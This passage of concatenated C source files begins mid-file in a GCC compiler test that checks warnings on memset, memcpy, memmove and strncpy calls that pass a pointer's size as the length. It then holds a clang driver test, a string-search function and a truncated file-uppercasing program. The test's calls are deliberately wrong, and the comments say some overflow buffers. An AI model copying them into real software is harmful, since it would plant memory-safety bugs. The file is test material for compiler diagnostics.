memcpy (pa1, x, sizeof (pa1)); /* { dg-warning "call is the same expression as the destination; did you mean to dereference it" } */
memcpy (pa2, x, sizeof pa2); /* { dg-warning "call is the same expression as the destination; did you mean to dereference it" } */
memcpy (pa3, x, sizeof (pa3)); /* { dg-warning "call is the same expression as the destination; did you mean to dereference it" } */
memcpy (pa4, x, sizeof pa4); /* { dg-warning "call is the same expression as the destination; did you mean to dereference it" } */
memcpy (pa1, x, sizeof (struct A *)); /* { dg-warning "call is the same pointer type \[^\n\r\]* as the destination; expected \[^\n\r\]* or an explicit length" } */
memcpy (pa2, x, sizeof (PTA)); /* { dg-warning "call is the same pointer type \[^\n\r\]* as the destination; expected \[^\n\r\]* or an explicit length" } */
memcpy (pa3, x, sizeof (PA)); /* { dg-warning "call is the same pointer type \[^\n\r\]* as the destination; expected \[^\n\r\]* or an explicit length" } */
memcpy (pa4, x, sizeof (__typeof (pa4))); /* { dg-warning "call is the same pointer type \[^\n\r\]* as the destination; expected \[^\n\r\]* or an explicit length" } */
memcpy (x, &a, sizeof (&a)); /* { dg-warning "call is the same expression as the source; did you mean to remove the addressof" } */
memcpy (x, pa1, sizeof (pa1)); /* { dg-warning "call is the same expression as the source; did you mean to dereference it" } */
memcpy (x, pa2, sizeof pa2); /* { dg-warning "call is the same expression as the source; did you mean to dereference it" } */
memcpy (x, pa3, sizeof (pa3)); /* { dg-warning "call is the same expression as the source; did you mean to dereference it" } */
memcpy (x, pa4, sizeof pa4); /* { dg-warning "call is the same expression as the source; did you mean to dereference it" } */
memcpy (x, pa1, sizeof (struct A *)); /* { dg-warning "call is the same pointer type \[^\n\r\]* as the source; expected \[^\n\r\]* or an explicit length" } */
memcpy (x, pa2, sizeof (PTA)); /* { dg-warning "call is the same pointer type \[^\n\r\]* as the source; expected \[^\n\r\]* or an explicit length" } */
memcpy (x, pa3, sizeof (PA)); /* { dg-warning "call is the same pointer type \[^\n\r\]* as the source; expected \[^\n\r\]* or an explicit length" } */
memcpy (x, pa4, sizeof (__typeof (pa4))); /* { dg-warning "call is the same pointer type \[^\n\r\]* as the source; expected \[^\n\r\]* or an explicit length" } */
memmove (&a, x, sizeof (&a)); /* { dg-warning "call is the same expression as the destination; did you mean to remove the addressof" } */
memmove (pa1, x, sizeof (pa1)); /* { dg-warning "call is the same expression as the destination; did you mean to dereference it" } */
memmove (pa2, x, sizeof pa2); /* { dg-warning "call is the same expression as the destination; did you mean to dereference it" } */
memmove (pa3, x, sizeof (pa3)); /* { dg-warning "call is the same expression as the destination; did you mean to dereference it" } */
memmove (pa4, x, sizeof pa4); /* { dg-warning "call is the same expression as the destination; did you mean to dereference it" } */
memmove (pa1, x, sizeof (struct A *)); /* { dg-warning "call is the same pointer type \[^\n\r\]* as the destination; expected \[^\n\r\]* or an explicit length" } */
memmove (pa2, x, sizeof (PTA)); /* { dg-warning "call is the same pointer type \[^\n\r\]* as the destination; expected \[^\n\r\]* or an explicit length" } */
memmove (pa3, x, sizeof (PA)); /* { dg-warning "call is the same pointer type \[^\n\r\]* as the destination; expected \[^\n\r\]* or an explicit length" } */
memmove (pa4, x, sizeof (__typeof (pa4)));/* { dg-warning "call is the same pointer type \[^\n\r\]* as the destination; expected \[^\n\r\]* or an explicit length" } */
memmove (x, &a, sizeof (&a)); /* { dg-warning "call is the same expression as the source; did you mean to remove the addressof" } */
memmove (x, pa1, sizeof (pa1)); /* { dg-warning "call is the same expression as the source; did you mean to dereference it" } */
memmove (x, pa2, sizeof pa2); /* { dg-warning "call is the same expression as the source; did you mean to dereference it" } */
memmove (x, pa3, sizeof (pa3)); /* { dg-warning "call is the same expression as the source; did you mean to dereference it" } */
memmove (x, pa4, sizeof pa4); /* { dg-warning "call is the same expression as the source; did you mean to dereference it" } */
memmove (x, pa1, sizeof (struct A *)); /* { dg-warning "call is the same pointer type \[^\n\r\]* as the source; expected \[^\n\r\]* or an explicit length" } */
memmove (x, pa2, sizeof (PTA)); /* { dg-warning "call is the same pointer type \[^\n\r\]* as the source; expected \[^\n\r\]* or an explicit length" } */
memmove (x, pa3, sizeof (PA)); /* { dg-warning "call is the same pointer type \[^\n\r\]* as the source; expected \[^\n\r\]* or an explicit length" } */
memmove (x, pa4, sizeof (__typeof (pa4)));/* { dg-warning "call is the same pointer type \[^\n\r\]* as the source; expected \[^\n\r\]* or an explicit length" } */
/* These are correct, no warning. */
memset (&a, 0, sizeof a);
memset (&a, 0, sizeof (a));
memset (&a, 0, sizeof (struct A));
memset (&a, 0, sizeof (const struct A));
memset (&a, 0, sizeof (volatile struct A));
memset (&a, 0, sizeof (volatile const struct A));
memset (&a, 0, sizeof (TA));
memset (&a, 0, sizeof (__typeof (*&a)));
memset (pa1, 0, sizeof (*pa1));
memset (pa2, 0, sizeof (*pa3));
memset (pa3, 0, sizeof (__typeof (*pa3)));
/* These are probably broken, but obfuscated, no warning. */
memset ((void *) &a, 0, sizeof (&a));
memset ((char *) &a, 0, sizeof (&a));
memset (&a, 0, sizeof (&a) + 0);
memset (&a, 0, 0 + sizeof (&a));
/* These are correct, no warning. */
memcpy (&a, x, sizeof a);
memcpy (&a, x, sizeof (a));
memcpy (&a, x, sizeof (struct A));
memcpy (&a, x, sizeof (const struct A));
memcpy (&a, x, sizeof (volatile struct A));
memcpy (&a, x, sizeof (volatile const struct A));
memcpy (&a, x, sizeof (TA));
memcpy (&a, x, sizeof (__typeof (*&a)));
memcpy (pa1, x, sizeof (*pa1));
memcpy (pa2, x, sizeof (*pa3));
memcpy (pa3, x, sizeof (__typeof (*pa3)));
/* These are probably broken, but obfuscated, no warning. */
memcpy ((void *) &a, x, sizeof (&a));
memcpy ((char *) &a, x, sizeof (&a));
memcpy (&a, x, sizeof (&a) + 0);
memcpy (&a, x, 0 + sizeof (&a));
/* These are correct, no warning. */
memcpy (x, &a, sizeof a);
memcpy (x, &a, sizeof (a));
memcpy (x, &a, sizeof (struct A));
memcpy (x, &a, sizeof (const struct A));
memcpy (x, &a, sizeof (volatile struct A));
memcpy (x, &a, sizeof (volatile const struct A));
memcpy (x, &a, sizeof (TA));
memcpy (x, &a, sizeof (__typeof (*&a)));
memcpy (x, pa1, sizeof (*pa1));
memcpy (x, pa2, sizeof (*pa3));
memcpy (x, pa3, sizeof (__typeof (*pa3)));
/* These are probably broken, but obfuscated, no warning. */
memcpy (x, (void *) &a, sizeof (&a));
memcpy (x, (char *) &a, sizeof (&a));
memcpy (x, &a, sizeof (&a) + 0);
memcpy (x, &a, 0 + sizeof (&a));
/* These are correct, no warning. */
memmove (&a, x, sizeof a);
memmove (&a, x, sizeof (a));
memmove (&a, x, sizeof (struct A));
memmove (&a, x, sizeof (const struct A));
memmove (&a, x, sizeof (volatile struct A));
memmove (&a, x, sizeof (volatile const struct A));
memmove (&a, x, sizeof (TA));
memmove (&a, x, sizeof (__typeof (*&a)));
memmove (pa1, x, sizeof (*pa1));
memmove (pa2, x, sizeof (*pa3));
memmove (pa3, x, sizeof (__typeof (*pa3)));
/* These are probably broken, but obfuscated, no warning. */
memmove ((void *) &a, x, sizeof (&a));
memmove ((char *) &a, x, sizeof (&a));
memmove (&a, x, sizeof (&a) + 0);
memmove (&a, x, 0 + sizeof (&a));
/* These are correct, no warning. */
memmove (x, &a, sizeof a);
memmove (x, &a, sizeof (a));
memmove (x, &a, sizeof (struct A));
memmove (x, &a, sizeof (const struct A));
memmove (x, &a, sizeof (volatile struct A));
memmove (x, &a, sizeof (volatile const struct A));
memmove (x, &a, sizeof (TA));
memmove (x, &a, sizeof (__typeof (*&a)));
memmove (x, pa1, sizeof (*pa1));
memmove (x, pa2, sizeof (*pa3));
memmove (x, pa3, sizeof (__typeof (*pa3)));
/* These are probably broken, but obfuscated, no warning. */
memmove (x, (void *) &a, sizeof (&a));
memmove (x, (char *) &a, sizeof (&a));
memmove (x, &a, sizeof (&a) + 0);
memmove (x, &a, 0 + sizeof (&a));
}
void
f2 (void *x)
{
struct B b, *pb1 = &b;
TB *pb2 = &b;
PB pb3 = &b;
PTB pb4 = &b;
memset (&b, 0, sizeof (&b)); /* { dg-warning "call is the same expression as the destination; did you mean to remove the addressof" } */
memset (pb1, 0, sizeof (pb1)); /* { dg-warning "call is the same expression as the destination; did you mean to dereference it" } */
memset (pb2, 0, sizeof pb2); /* { dg-warning "call is the same expression as the destination; did you mean to dereference it" } */
memset (pb3, 0, sizeof (pb3)); /* { dg-warning "call is the same expression as the destination; did you mean to dereference it" } */
memset (pb4, 0, sizeof pb4); /* { dg-warning "call is the same expression as the destination; did you mean to dereference it" } */
memset (pb1, 0, sizeof (struct B *)); /* { dg-warning "call is the same pointer type \[^\n\r\]* as the destination; expected \[^\n\r\]* or an explicit length" } */
memset (pb2, 0, sizeof (PTB)); /* { dg-warning "call is the same pointer type \[^\n\r\]* as the destination; expected \[^\n\r\]* or an explicit length" } */
memset (pb3, 0, sizeof (PB)); /* { dg-warning "call is the same pointer type \[^\n\r\]* as the destination; expected \[^\n\r\]* or an explicit length" } */
memset (pb4, 0, sizeof (__typeof (pb4))); /* { dg-warning "call is the same pointer type \[^\n\r\]* as the destination; expected \[^\n\r\]* or an explicit length" } */
memcpy (&b, x, sizeof (&b)); /* { dg-warning "call is the same expression as the destination; did you mean to remove the addressof" } */
memcpy (pb1, x, sizeof (pb1)); /* { dg-warning "call is the same expression as the destination; did you mean to dereference it" } */
memcpy (pb2, x, sizeof pb2); /* { dg-warning "call is the same expression as the destination; did you mean to dereference it" } */
memcpy (pb3, x, sizeof (pb3)); /* { dg-warning "call is the same expression as the destination; did you mean to dereference it" } */
memcpy (pb4, x, sizeof pb4); /* { dg-warning "call is the same expression as the destination; did you mean to dereference it" } */
memcpy (pb1, x, sizeof (struct B *)); /* { dg-warning "call is the same pointer type \[^\n\r\]* as the destination; expected \[^\n\r\]* or an explicit length" } */
memcpy (pb2, x, sizeof (PTB)); /* { dg-warning "call is the same pointer type \[^\n\r\]* as the destination; expected \[^\n\r\]* or an explicit length" } */
memcpy (pb3, x, sizeof (PB)); /* { dg-warning "call is the same pointer type \[^\n\r\]* as the destination; expected \[^\n\r\]* or an explicit length" } */
memcpy (pb4, x, sizeof (__typeof (pb4))); /* { dg-warning "call is the same pointer type \[^\n\r\]* as the destination; expected \[^\n\r\]* or an explicit length" } */
memcpy (x, &b, sizeof (&b)); /* { dg-warning "call is the same expression as the source; did you mean to remove the addressof" } */
memcpy (x, pb1, sizeof (pb1)); /* { dg-warning "call is the same expression as the source; did you mean to dereference it" } */
memcpy (x, pb2, sizeof pb2); /* { dg-warning "call is the same expression as the source; did you mean to dereference it" } */
memcpy (x, pb3, sizeof (pb3)); /* { dg-warning "call is the same expression as the source; did you mean to dereference it" } */
memcpy (x, pb4, sizeof pb4); /* { dg-warning "call is the same expression as the source; did you mean to dereference it" } */
memcpy (x, pb1, sizeof (struct B *)); /* { dg-warning "call is the same pointer type \[^\n\r\]* as the source; expected \[^\n\r\]* or an explicit length" } */
memcpy (x, pb2, sizeof (PTB)); /* { dg-warning "call is the same pointer type \[^\n\r\]* as the source; expected \[^\n\r\]* or an explicit length" } */
memcpy (x, pb3, sizeof (PB)); /* { dg-warning "call is the same pointer type \[^\n\r\]* as the source; expected \[^\n\r\]* or an explicit length" } */
memcpy (x, pb4, sizeof (__typeof (pb4))); /* { dg-warning "call is the same pointer type \[^\n\r\]* as the source; expected \[^\n\r\]* or an explicit length" } */
memmove (&b, x, sizeof (&b)); /* { dg-warning "call is the same expression as the destination; did you mean to remove the addressof" } */
memmove (pb1, x, sizeof (pb1)); /* { dg-warning "call is the same expression as the destination; did you mean to dereference it" } */
memmove (pb2, x, sizeof pb2); /* { dg-warning "call is the same expression as the destination; did you mean to dereference it" } */
memmove (pb3, x, sizeof (pb3)); /* { dg-warning "call is the same expression as the destination; did you mean to dereference it" } */
memmove (pb4, x, sizeof pb4); /* { dg-warning "call is the same expression as the destination; did you mean to dereference it" } */
memmove (pb1, x, sizeof (struct B *)); /* { dg-warning "call is the same pointer type \[^\n\r\]* as the destination; expected \[^\n\r\]* or an explicit length" } */
memmove (pb2, x, sizeof (PTB)); /* { dg-warning "call is the same pointer type \[^\n\r\]* as the destination; expected \[^\n\r\]* or an explicit length" } */
memmove (pb3, x, sizeof (PB)); /* { dg-warning "call is the same pointer type \[^\n\r\]* as the destination; expected \[^\n\r\]* or an explicit length" } */
memmove (pb4, x, sizeof (__typeof (pb4)));/* { dg-warning "call is the same pointer type \[^\n\r\]* as the destination; expected \[^\n\r\]* or an explicit length" } */
memmove (x, &b, sizeof (&b)); /* { dg-warning "call is the same expression as the source; did you mean to remove the addressof" } */
memmove (x, pb1, sizeof (pb1)); /* { dg-warning "call is the same expression as the source; did you mean to dereference it" } */
memmove (x, pb2, sizeof pb2); /* { dg-warning "call is the same expression as the source; did you mean to dereference it" } */
memmove (x, pb3, sizeof (pb3)); /* { dg-warning "call is the same expression as the source; did you mean to dereference it" } */
memmove (x, pb4, sizeof pb4); /* { dg-warning "call is the same expression as the source; did you mean to dereference it" } */
memmove (x, pb1, sizeof (struct B *)); /* { dg-warning "call is the same pointer type \[^\n\r\]* as the source; expected \[^\n\r\]* or an explicit length" } */
memmove (x, pb2, sizeof (PTB)); /* { dg-warning "call is the same pointer type \[^\n\r\]* as the source; expected \[^\n\r\]* or an explicit length" } */
memmove (x, pb3, sizeof (PB)); /* { dg-warning "call is the same pointer type \[^\n\r\]* as the source; expected \[^\n\r\]* or an explicit length" } */
memmove (x, pb4, sizeof (__typeof (pb4)));/* { dg-warning "call is the same pointer type \[^\n\r\]* as the source; expected \[^\n\r\]* or an explicit length" } */
/* These are correct, no warning. */
memset (&b, 0, sizeof b);
memset (&b, 0, sizeof (b));
memset (&b, 0, sizeof (struct B));
memset (&b, 0, sizeof (const struct B));
memset (&b, 0, sizeof (volatile struct B));
memset (&b, 0, sizeof (volatile const struct B));
memset (&b, 0, sizeof (TB));
memset (&b, 0, sizeof (__typeof (*&b)));
memset (pb1, 0, sizeof (*pb1));
memset (pb2, 0, sizeof (*pb3));
memset (pb3, 0, sizeof (__typeof (*pb3)));
/* These are probably broken, but obfuscated, no warning. */
memset ((void *) &b, 0, sizeof (&b));
memset ((char *) &b, 0, sizeof (&b));
memset (&b, 0, sizeof (&b) + 0);
memset (&b, 0, 0 + sizeof (&b));
/* These are correct, no warning. */
memcpy (&b, x, sizeof b);
memcpy (&b, x, sizeof (b));
memcpy (&b, x, sizeof (struct B));
memcpy (&b, x, sizeof (const struct B));
memcpy (&b, x, sizeof (volatile struct B));
memcpy (&b, x, sizeof (volatile const struct B));
memcpy (&b, x, sizeof (TB));
memcpy (&b, x, sizeof (__typeof (*&b)));
memcpy (pb1, x, sizeof (*pb1));
memcpy (pb2, x, sizeof (*pb3));
memcpy (pb3, x, sizeof (__typeof (*pb3)));
/* These are probably broken, but obfuscated, no warning. */
memcpy ((void *) &b, x, sizeof (&b));
memcpy ((char *) &b, x, sizeof (&b));
memcpy (&b, x, sizeof (&b) + 0);
memcpy (&b, x, 0 + sizeof (&b));
/* These are correct, no warning. */
memcpy (x, &b, sizeof b);
memcpy (x, &b, sizeof (b));
memcpy (x, &b, sizeof (struct B));
memcpy (x, &b, sizeof (const struct B));
memcpy (x, &b, sizeof (volatile struct B));
memcpy (x, &b, sizeof (volatile const struct B));
memcpy (x, &b, sizeof (TB));
memcpy (x, &b, sizeof (__typeof (*&b)));
memcpy (x, pb1, sizeof (*pb1));
memcpy (x, pb2, sizeof (*pb3));
memcpy (x, pb3, sizeof (__typeof (*pb3)));
/* These are probably broken, but obfuscated, no warning. */
memcpy (x, (void *) &b, sizeof (&b));
memcpy (x, (char *) &b, sizeof (&b));
memcpy (x, &b, sizeof (&b) + 0);
memcpy (x, &b, 0 + sizeof (&b));
/* These are correct, no warning. */
memmove (&b, x, sizeof b);
memmove (&b, x, sizeof (b));
memmove (&b, x, sizeof (struct B));
memmove (&b, x, sizeof (const struct B));
memmove (&b, x, sizeof (volatile struct B));
memmove (&b, x, sizeof (volatile const struct B));
memmove (&b, x, sizeof (TB));
memmove (&b, x, sizeof (__typeof (*&b)));
memmove (pb1, x, sizeof (*pb1));
memmove (pb2, x, sizeof (*pb3));
memmove (pb3, x, sizeof (__typeof (*pb3)));
/* These are probably broken, but obfuscated, no warning. */
memmove ((void *) &b, x, sizeof (&b));
memmove ((char *) &b, x, sizeof (&b));
memmove (&b, x, sizeof (&b) + 0);
memmove (&b, x, 0 + sizeof (&b));
/* These are correct, no warning. */
memmove (x, &b, sizeof b);
memmove (x, &b, sizeof (b));
memmove (x, &b, sizeof (struct B));
memmove (x, &b, sizeof (const struct B));
memmove (x, &b, sizeof (volatile struct B));
memmove (x, &b, sizeof (volatile const struct B));
memmove (x, &b, sizeof (TB));
memmove (x, &b, sizeof (__typeof (*&b)));
memmove (x, pb1, sizeof (*pb1));
memmove (x, pb2, sizeof (*pb3));
memmove (x, pb3, sizeof (__typeof (*pb3)));
/* These are probably broken, but obfuscated, no warning. */
memmove (x, (void *) &b, sizeof (&b));
memmove (x, (char *) &b, sizeof (&b));
memmove (x, &b, sizeof (&b) + 0);
memmove (x, &b, 0 + sizeof (&b));
}
void
f3 (void *x, char *y, int z, X w)
{
unsigned char *y1 = (unsigned char *) __builtin_alloca (z + 16);
char buf1[7];
signed char buf2[z + 32];
long buf3[17];
int *buf4[9];
signed char *y2 = buf2;
char c;
char *y3;
memset (y, 0, sizeof (y)); /* { dg-warning "call is the same expression as the destination; did you mean to provide an explicit length" } */
memset (y1, 0, sizeof (y1)); /* { dg-warning "call is the same expression as the destination; did you mean to provide an explicit length" } */
memset (y2, 0, sizeof (y2)); /* { dg-warning "call is the same expression as the destination; did you mean to provide an explicit length" } */
memset (&c, 0, sizeof (&c)); /* { dg-warning "call is the same expression as the destination; did you mean to remove the addressof" } */
memset (w, 0, sizeof w); /* { dg-warning "call is the same expression as the destination; did you mean to dereference it" } */
memcpy (y, x, sizeof (y)); /* { dg-warning "call is the same expression as the destination; did you mean to provide an explicit length" } */
memcpy (y1, x, sizeof (y1)); /* { dg-warning "call is the same expression as the destination; did you mean to provide an explicit length" } */
memcpy (y2, x, sizeof (y2)); /* { dg-warning "call is the same expression as the destination; did you mean to provide an explicit length" } */
memcpy (&c, x, sizeof (&c)); /* { dg-warning "call is the same expression as the destination; did you mean to remove the addressof" } */
memcpy (w, x, sizeof w); /* { dg-warning "call is the same expression as the destination; did you mean to dereference it" } */
memcpy (x, y, sizeof (y)); /* { dg-warning "call is the same expression as the source; did you mean to provide an explicit length" } */
memcpy (x, y1, sizeof (y1)); /* { dg-warning "call is the same expression as the source; did you mean to provide an explicit length" } */
memcpy (x, y2, sizeof (y2)); /* { dg-warning "call is the same expression as the source; did you mean to provide an explicit length" } */
memcpy (x, &c, sizeof (&c)); /* { dg-warning "call is the same expression as the source; did you mean to remove the addressof" } */
memcpy (x, w, sizeof w); /* { dg-warning "call is the same expression as the source; did you mean to dereference it" } */
memmove (y, x, sizeof (y)); /* { dg-warning "call is the same expression as the destination; did you mean to provide an explicit length" } */
memmove (y1, x, sizeof (y1)); /* { dg-warning "call is the same expression as the destination; did you mean to provide an explicit length" } */
memmove (y2, x, sizeof (y2)); /* { dg-warning "call is the same expression as the destination; did you mean to provide an explicit length" } */
memmove (&c, x, sizeof (&c)); /* { dg-warning "call is the same expression as the destination; did you mean to remove the addressof" } */
memmove (w, x, sizeof w); /* { dg-warning "call is the same expression as the destination; did you mean to dereference it" } */
memmove (x, y, sizeof (y)); /* { dg-warning "call is the same expression as the source; did you mean to provide an explicit length" } */
memmove (x, y1, sizeof (y1)); /* { dg-warning "call is the same expression as the source; did you mean to provide an explicit length" } */
memmove (x, y2, sizeof (y2)); /* { dg-warning "call is the same expression as the source; did you mean to provide an explicit length" } */
memmove (x, &c, sizeof (&c)); /* { dg-warning "call is the same expression as the source; did you mean to remove the addressof" } */
memmove (x, w, sizeof w); /* { dg-warning "call is the same expression as the source; did you mean to dereference it" } */
/* These are correct, no warning. */
memset (y, 0, sizeof (*y));
memset (y1, 0, sizeof (*y2));
memset (buf1, 0, sizeof buf1);
memset (buf3, 0, sizeof (buf3));
memset (&buf3[0], 0, sizeof (buf3));
memset (&buf4[0], 0, sizeof (buf4));
memset (w, 0, sizeof (X));
/* These are probably broken, but obfuscated, no warning. */
memset ((void *) y, 0, sizeof (y));
memset ((char *) y1, 0, sizeof (y2));
memset (y, 0, sizeof (y) + 0);
memset (y1, 0, 0 + sizeof (y2));
memset ((void *) &c, 0, sizeof (&c));
memset ((signed char *) &c, 0, sizeof (&c));
memset (&c, 0, sizeof (&c) + 0);
memset (&c, 0, 0 + sizeof (&c));
/* These are correct, no warning. */
memcpy (y, x, sizeof (*y));
memcpy (y1, x, sizeof (*y2));
memcpy (buf1, x, sizeof buf1);
memcpy (buf3, x, sizeof (buf3));
memcpy (&buf3[0], x, sizeof (buf3));
memcpy (&buf4[0], x, sizeof (buf4));
memcpy (&y3, y, sizeof (y3));
memcpy ((char *) &y3, y, sizeof (y3));
memcpy (w, x, sizeof (X));
/* These are probably broken, but obfuscated, no warning. */
memcpy ((void *) y, x, sizeof (y));
memcpy ((char *) y1, x, sizeof (y2));
memcpy (y, x, sizeof (y) + 0);
memcpy (y1, x, 0 + sizeof (y2));
memcpy ((void *) &c, x, sizeof (&c));
memcpy ((signed char *) &c, x, sizeof (&c));
memcpy (&c, x, sizeof (&c) + 0);
memcpy (&c, x, 0 + sizeof (&c));
/* These are correct, no warning. */
memcpy (x, y, sizeof (*y));
memcpy (x, y1, sizeof (*y2));
memcpy (x, buf1, sizeof buf1);
memcpy (x, buf3, sizeof (buf3));
memcpy (x, &buf3[0], sizeof (buf3));
memcpy (x, &buf4[0], sizeof (buf4));
memcpy (y, &y3, sizeof (y3));
memcpy (y, (char *) &y3, sizeof (y3));
memcpy (x, w, sizeof (X));
/* These are probably broken, but obfuscated, no warning. */
memcpy (x, (void *) y, sizeof (y));
memcpy (x, (char *) y1, sizeof (y2));
memcpy (x, y, sizeof (y) + 0);
memcpy (x, y1, 0 + sizeof (y2));
memcpy (x, (void *) &c, sizeof (&c));
memcpy (x, (signed char *) &c, sizeof (&c));
memcpy (x, &c, sizeof (&c) + 0);
memcpy (x, &c, 0 + sizeof (&c));
/* These are correct, no warning. */
memmove (y, x, sizeof (*y));
memmove (y1, x, sizeof (*y2));
memmove (buf1, x, sizeof buf1);
memmove (buf3, x, sizeof (buf3));
memmove (&buf3[0], x, sizeof (buf3));
memmove (&buf4[0], x, sizeof (buf4));
memmove (&y3, y, sizeof (y3));
memmove ((char *) &y3, y, sizeof (y3));
memmove (w, x, sizeof (X));
/* These are probably broken, but obfuscated, no warning. */
memmove ((void *) y, x, sizeof (y));
memmove ((char *) y1, x, sizeof (y2));
memmove (y, x, sizeof (y) + 0);
memmove (y1, x, 0 + sizeof (y2));
memmove ((void *) &c, x, sizeof (&c));
memmove ((signed char *) &c, x, sizeof (&c));
memmove (&c, x, sizeof (&c) + 0);
memmove (&c, x, 0 + sizeof (&c));
/* These are correct, no warning. */
memmove (x, y, sizeof (*y));
memmove (x, y1, sizeof (*y2));
memmove (x, buf1, sizeof buf1);
memmove (x, buf3, sizeof (buf3));
memmove (x, &buf3[0], sizeof (buf3));
memmove (x, &buf4[0], sizeof (buf4));
memmove (y, &y3, sizeof (y3));
memmove (y, (char *) &y3, sizeof (y3));
memmove (x, w, sizeof (X));
/* These are probably broken, but obfuscated, no warning. */
memmove (x, (void *) y, sizeof (y));
memmove (x, (char *) y1, sizeof (y2));
memmove (x, y, sizeof (y) + 0);
memmove (x, y1, 0 + sizeof (y2));
memmove (x, (void *) &c, sizeof (&c));
memmove (x, (signed char *) &c, sizeof (&c));
memmove (x, &c, sizeof (&c) + 0);
memmove (x, &c, 0 + sizeof (&c));
}
void
f4 (char *x, char **y, int z, char w[64])
{
const char *s1 = "foobarbaz";
const char *s2 = "abcde12345678";
strncpy (x, s1, sizeof (s1)); /* { dg-warning "call is the same expression as the source; did you mean to provide an explicit length" } */
strncat (x, s2, sizeof (s2)); /* { dg-warning "call is the same expression as the source; did you mean to provide an explicit length" } */
stpncpy (x, s1, sizeof (s1)); /* { dg-warning "call is the same expression as the source; did you mean to provide an explicit length" } */
strncpy (w, s1, sizeof (w)); /* { dg-warning "call is the same expression as the destination; did you mean to provide an explicit length" } */
strncat (w, s2, sizeof (w)); /* { dg-warning "call is the same expression as the destination; did you mean to provide an explicit length" } */
stpncpy (w, s1, sizeof (w)); /* { dg-warning "call is the same expression as the destination; did you mean to provide an explicit length" } */
/* These are pointless when the destination is large enough, and
cause overflow otherwise. If the copies are guaranteed to be
safe the calls might as well be replaced by strcat(), strcpy(),
or memcpy(). */
const char s3[] = "foobarbaz";
const char s4[] = "abcde12345678";
strncpy (x, s3, sizeof (s3)); /* { dg-warning "call is the same expression as the source; did you mean to use the size of the destination?" } */
strncat (x, s4, sizeof (s4)); /* { dg-warning "call is the same expression as the source; did you mean to use the size of the destination?" } */
stpncpy (x, s3, sizeof (s3)); /* { dg-warning "call is the same expression as the source; did you mean to use the size of the destination?" } */
}
/* { dg-prune-output "\[\n\r\]*writing\[\n\r\]*" } */
/* { dg-prune-output "\[\n\r\]*reading\[\n\r\]*" } */
|
the_stack_data/75137867.c | // REQUIRES: x86-registered-target,aarch64-registered-target
// RUN: %clang -fglobal-isel -S -### %s 2>&1 | FileCheck --check-prefix=ENABLED %s
// RUN: %clang -fno-global-isel -S -### %s 2>&1 | FileCheck --check-prefix=DISABLED %s
// RUN: %clang -target aarch64 -fglobal-isel -S %s -### 2>&1 | FileCheck --check-prefix=ARM64-DEFAULT %s
// RUN: %clang -target aarch64 -fglobal-isel -S -O0 %s -### 2>&1 | FileCheck --check-prefix=ARM64-O0 %s
// RUN: %clang -target aarch64 -fglobal-isel -S -O2 %s -### 2>&1 | FileCheck --check-prefix=ARM64-O2 %s
// RUN: %clang -target aarch64 -fglobal-isel -Wno-global-isel -S -O2 %s -### 2>&1 | FileCheck --check-prefix=ARM64-O2-NOWARN %s
// RUN: %clang -target x86_64 -fglobal-isel -S %s -### 2>&1 | FileCheck --check-prefix=X86_64 %s
// Now test the aliases.
// RUN: %clang -fexperimental-isel -S -### %s 2>&1 | FileCheck --check-prefix=ENABLED %s
// RUN: %clang -fno-experimental-isel -S -### %s 2>&1 | FileCheck --check-prefix=DISABLED %s
// RUN: %clang -target aarch64 -fexperimental-isel -S %s -### 2>&1 | FileCheck --check-prefix=ARM64-DEFAULT %s
// RUN: %clang -target aarch64 -fexperimental-isel -S -O0 %s -### 2>&1 | FileCheck --check-prefix=ARM64-O0 %s
// RUN: %clang -target aarch64 -fexperimental-isel -S -O2 %s -### 2>&1 | FileCheck --check-prefix=ARM64-O2 %s
// RUN: %clang -target x86_64 -fexperimental-isel -S %s -### 2>&1 | FileCheck --check-prefix=X86_64 %s
// ENABLED: "-mllvm" "-global-isel=1"
// DISABLED: "-mllvm" "-global-isel=0"
// ARM64-DEFAULT-NOT: warning: -fglobal-isel
// ARM64-DEFAULT-NOT: "-global-isel-abort=2"
// ARM64-O0-NOT: warning: -fglobal-isel
// ARM64-O2: warning: -fglobal-isel support is incomplete for this architecture at the current optimization level
// ARM64-O2: "-mllvm" "-global-isel-abort=2"
// ARM64-O2-NOWARN-NOT: warning: -fglobal-isel
// X86_64: -fglobal-isel support for the 'x86_64' architecture is incomplete
// X86_64: "-mllvm" "-global-isel-abort=2"
|
the_stack_data/57951184.c | /* ************************************************************************** */
/* */
/* ::: :::::::: */
/* ft_strchr.c :+: :+: :+: */
/* +:+ +:+ +:+ */
/* By: aulopez <[email protected]> +#+ +:+ +#+ */
/* +#+#+#+#+#+ +#+ */
/* Created: 2018/11/14 01:22:00 by aulopez #+# #+# */
/* Updated: 2019/10/14 17:39:58 by aulopez ### ########.fr */
/* */
/* ************************************************************************** */
#include <string.h>
char *ft_strchr(const char *s, int c)
{
if ((unsigned char)*s == c)
return ((char *)s);
while (*(s++))
if ((unsigned char)*s == c)
return ((char *)s);
return (NULL);
}
/*
**static inline char *basic_strchr(char *s, int c)
**{
** if ((unsigned char)*s == c)
** return (s);
** while (*(s++))
** if ((unsigned char)*s == c)
** return (s);
** return (NULL);
**}
**
**static inline char *loopword(char *s, unsigned char c)
**{
** const uint64_t *pll;
** uint64_t c_each_byte;
** uint64_t zero_mask;
**
** pll = (const uint64_t *)s;
** c_each_byte = c | (c << 8);
** c_each_byte |= c_each_byte << 16;
** c_each_byte |= c_each_byte << 32;
** while (1)
** {
** zero_mask = *pll ^ c_each_byte;
** if (((zero_mask - ONE_EACH_BYTE) & ~zero_mask) & REV_EACH_BYTE)
** break ;
** else if (((*pll - ONE_EACH_BYTE) & ~*pll) & REV_EACH_BYTE)
** return (NULL);
** ++pll;
** }
** s = (char *)pll;
** return (s);
**}
**
**char *ft_strchr(const char *s, int c)
**{
** while ((uintptr_t)s & 0x7)
** {
** if ((unsigned char)*s == c)
** return ((char *)s);
** if (!*s++)
** return (NULL);
** }
** if (!(s = (const char *)loopword((char *)s, (unsigned char)c)))
** return (NULL);
** return (basic_strchr((char *)s, c));
**}
*/
|
the_stack_data/193892428.c | #include <stdio.h>
#include <stdlib.h>
#include <ctype.h>
#define SIZE 40 //文件名长度
int main(void){
char filename[SIZE]; //存放文件名
FILE * src,* dest; //读写文件的指针
int ch;
fprintf(stdout,"Enter the filename:\n");
while(fscanf(stdin,"%s",filename) == EOF){
fprintf(stderr,"no filename");
exit(EXIT_FAILURE);
}
while((src=fopen(filename,"r")) ==NULL || (dest = fopen(filename,"r+")) == NULL){
fprintf(stderr,"Can't open %s",filename);
}
while((ch=getc(src)) !=EOF){
ch=toupper(ch);
putc(ch,dest);
}
